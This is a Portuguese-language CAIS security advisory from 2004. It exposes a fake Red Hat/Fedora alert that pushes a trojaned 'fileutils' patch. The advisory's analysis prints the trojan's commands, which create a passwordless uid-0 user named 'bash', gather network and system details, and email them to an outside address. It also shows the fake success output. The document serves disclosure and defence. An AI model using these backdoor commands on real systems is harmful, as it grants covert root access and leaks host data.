Falso alerta do Fedora-RedHat

Alerta do CAIS 25102004

[CAIS, 25.10.2004-17:45, revisão 01]

O CAIS está acompanhando desde ontem a divulgação de uma mensagem falsa cujo conteudo tenta se passar por um alerta de segurança da distribuição Fedora.

Tal alerta faz referência ao site http://fedora-redhat.com/, onde é disponibilizada uma falsa correção:

fileutils-1.0.6.patch.tar.gz (68349c219d941209af8f7c968b89d622)

Este arquivo é composto dos seguintes arquivos:

990084 Out 23 16:06 fileutils-patch.bin (7d6f449488f8e7360c74101c20e4052c)
14297 Out 23 13:02 inst.c (c6b4e5e288b6ab9ea6157794df811d8f)
32 Out 22 21:59 Makefile (fe6c3513f6f0fa47392e89071ba9cde6)

Análise

De acordo com as análises realizadas nos arquivos, esta falsa correção não explora nenhuma vulnerabilidade no sistema. Ela depende da ação do usuário que, ao instalar a suposta correção como usuário "root", permite que as ações descritas abaixo sejam executadas:

O script "inst.c" deve ser compilado e executado. Ele verifica se o usuário está executando como "root";
Ao ser executado, um usuário chamado "bash" é criado com permissões de super-usuario e sem senha;
O script cria um arquivo chamado /tmp/mama, com o conteúdo dos seguintes comandos:

echo "Inca un root frate belea: " >> /tmp/mama
adduser -g 0 -u 0 -o bash >> /tmp/mama
passwd -d bash >> /tmp/mama
ifconfig >> /tmp/mama
uname -a >> /tmp/mama
uptime >> /tmp/mama
sshd >> /tmp/mama
echo "user bash stii tu" >> /tmp/mama
É enviado um e-mail para root@addlebrain.com, com o Subject: "Inca o roata", com o conteúdo do arquivo /tmp/mama
O script cria o seguinte diretório:
/tmp/." "/." "/." "/." "/." "/." "/." "/." "/." "
saída da execução do binário "inst", resultante da compilação do código-fonte inst.c incluso no pacote:
identifying the system. This may take up to 2 minutes. Please wait ...
./inst: sshd: command not found
System looks OK. Proceeding to next step.

Patching "ls": ###########
Patching "mkdir": ###########

System updated and secured successfuly. You may erase these files.
[root@localhost fileutils-1.0.6.patch]#

Mais informações

[Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"
http://lists.netsys.com/pipermail/full-disclosure/2004-October/028031.html
RedHat.com - Security and Updates
http://www.redhat.com/security

Os alertas enviados pela RedHat tem como origem o endereço de email secalert@redhat.com e sao assinados digitalmente com uma chave PGP disponível no seguinte endereço:
http://www.redhat.com/security/team/key.html

O CAIS recomenda que sempre seja verificada autenticidade de mensagens enviadas por grupos de segurança e representantes de empresas. Na maioria dos casos é possível verificar a integridade dos arquivos a serem instalados.

Os Alertas do CAIS também são oferecidos no formato RSS/RDF:
http://www.rnp.br/cais/alertas/rss.xml

Listas de alertas publicados:
2012 | 2011 | 2010 | 2009 | 2008 | 2007 | 2006 | 2005 | 2004 | 2003 | 2002 | 2001 | 2000 | 1999 | 1998

Assinatura dos Alertas do CAIS

Assine a lista de alertas do CAIS e receba antecipadamente, por correio eletrônico, as mais recentes notificações sobre segurança em redes e sistemas.

Formulário de assinatura dos Alertas do CAIS

Formulário de assinatura

Contato com o Cais:

+55 (19) 3787-3300
+55 (19) 3787-3301

cais@cais.rnp.br

Chave PGP pública do Cais